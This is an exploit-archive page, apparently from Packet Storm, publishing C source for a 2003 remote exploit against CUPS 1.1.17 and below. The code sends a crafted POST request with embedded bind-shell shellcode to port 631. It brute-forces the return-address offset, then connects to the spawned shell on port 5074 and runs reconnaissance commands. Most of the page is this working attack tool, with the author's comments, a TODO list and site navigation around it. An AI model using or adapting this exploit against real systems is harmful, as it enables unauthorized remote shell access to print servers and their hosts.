exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mod_sigcups.c

mod_sigcups.c
Posted May 31, 2003

Cups v1.1.17 and below remote exploit which spawns a shell as lp. Modified version of the original sigcups.c exploit.

tags | exploit, remote, shell
SHA-256 | 5a88fad62d69412d2762fa193f415a3d84cba3182a07cc0ff828178c6b46a28d

mod_sigcups.c

Change Mirror Download

/* DEMOCOW-BRUTE-CUPS.c by democow "the sad cow"
this is a modified version of sigcups.c by sigdoon
i had a need for this, so i wrote this

i am sad beacuse so much open source/public exploit code is abused
by info$ec now any open discussion has become
their helping hand in other words.........
young fish must not eat their tainted worms

TODO:
1. add support for new cups partial request DoS just for fun
2. look though cups source a little more and find a better way to ID
vuln servers
3. improve the server-offset feature
4. add arm shellcode,and libc addrs
5. add hostlookups

THIS CODE IS PRIVATE, DO NOT DISTRIBUTE... DO NOT SUPPORT THE INFO$EC
INDUSTRY, THEY ARE EXPLOITING YOU WITH YOUR EXPLOITS
democow8086@hotmail.com
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>

#define BUF_SIZE 4096
#define SERVER_ID "CUPS/1.1" //8 bytes long

#define die(a) { perror("[!] "a); exit(-1); }

//this will be added to when the correct offsets for
//certin systems have been found
typedef struct identified
{
int type;
char os[1040];
int offset;
}target;

int buildAttack(int offset,char *host, int port)
{
char hellcode[]=
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


struct sockaddr_in dest;
int i,off,sock;
unsigned long retaddr = 805289688;
char buf[BUF_SIZE];
char buf2[BUF_SIZE];

char greet[] = "POST /jobs HTTP/1.1\nContent-type: application/x-www-form-urlencoded\nContent-length: %d\n\n";

char evilmsg[] = "-%u=";

//it is just sad to have an integer overflow
//within an integer overflow exploit
if(offset < 0)
{
printf("[*] integer overflow alert please increase the size of offset\n");
return 1;
}

retaddr += offset;

printf("[*] connecting to %s port %d\n", host, port);
printf("[*] trying retaddr = 0x%x; *4 = 0x%x\n", retaddr, retaddr*4);
printf("[*] the current offset is %i\n",offset);

if ( (sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
{
perror("socket()");
return 1; //return fail
}

dest.sin_family = AF_INET;
dest.sin_port = htons(port);
dest.sin_addr.s_addr = inet_addr(host);
bzero( &(dest.sin_zero), 8);


if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr))<0)
{
perror("connect()");
return 1; //return fail
}

printf("[*] connect created attempting to brute\n");
off = sprintf(buf, evilmsg, retaddr);

for(i = 0; i<sizeof(hellcode)-1; i++)
sprintf(buf+off+i*3, "%%%02X", (unsigned char)hellcode[i]);

//load greet
sprintf(buf2, greet, strlen(buf));

//send our crafted data out
write(sock, buf2, strlen(buf2) );
write(sock,buf, strlen(buf) );

close(sock);
return 0; //attack sent :) be happy you sad cow
}

//this will verify if the exploit worked
int shellConnect(char *host)
{
struct sockaddr_in target;
fd_set rset;
int socketfd;
int happy = 0;
int incomming;
char buffer[BUF_SIZE];
//i want to let socket() errors end the program in a messy way
if( (socketfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
die("socket()");

target.sin_family = AF_INET;
target.sin_port = htons(5074);
target.sin_addr.s_addr = inet_addr(host);
bzero(&(target.sin_zero), 8);

//note to democow rewrite this ASAP
system("sleep 3");

if(connect(socketfd, (struct sockaddr*)&target,sizeof(struct sockaddr)) < 0)
{
perror("connect");
return 1;//return with exploit fail
} else { happy = 1;}

write(socketfd,"id;uname -a;cat /etc/*rel*\n",27);

while(happy =1)
{
FD_ZERO(&rset);
FD_SET(socketfd,&rset);
FD_SET(STDIN_FILENO, &rset);

select(socketfd+1,&rset,NULL, NULL, NULL);

if(FD_ISSET(socketfd,&rset) )
{

incomming = read(socketfd,buffer, BUF_SIZE-1);

if(incomming <= 0)
{
printf("[*] Connection Lost Sorry Mate\n");
close(socketfd);
return 2; //return with a conn lost retry
}

buffer[incomming] = 0;
printf("%s", buffer);
}

if(FD_ISSET(STDIN_FILENO, &rset) )
{
incomming = read(STDIN_FILENO, buffer, BUF_SIZE - 1);
if(incomming > 0)
{
buffer[incomming] = 0;
write(socketfd, buffer, incomming);
} //end if(incomming)
}//end STDIN_FILENO check
}//end while
return 0; //this will never be reached
}

int main(int argc, char *argv[])
{
int running;
int offset;
char *target;
int temp;
running = 1;
offset = 0;

if(argc < 2)
{
printf("USEAGE %s [IP TO ATTACK]\n",argv[0]);
//this is all one big joke to me
__asm__("movb $0x01, %al");
__asm__("int $0x80");
} else { target = argv[1]; }

//start the fun loop :)
while(running == 1)
{

if( (temp= buildAttack(offset,target,631)) ==1)
{
printf("major connection failure aborting\n");
running = 0; //connection failures are upsetting
return 0;
}

switch ( (temp = shellConnect(target) ))
{
case '1': //general fail.. i except aton of these
offset++;
break;

case '2':
offset = offset; //i could do nothing but dun wanna
break;

case '0': //are we all done?
return 0; //i dont understand why i do this
break;

default:
offset++; //why not
break;

}

}
printf("you are a beast of your mind mr. cow\n");
return 0;
}




--
This message has been sent via an anonymous mail relay at www.no-id.com.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close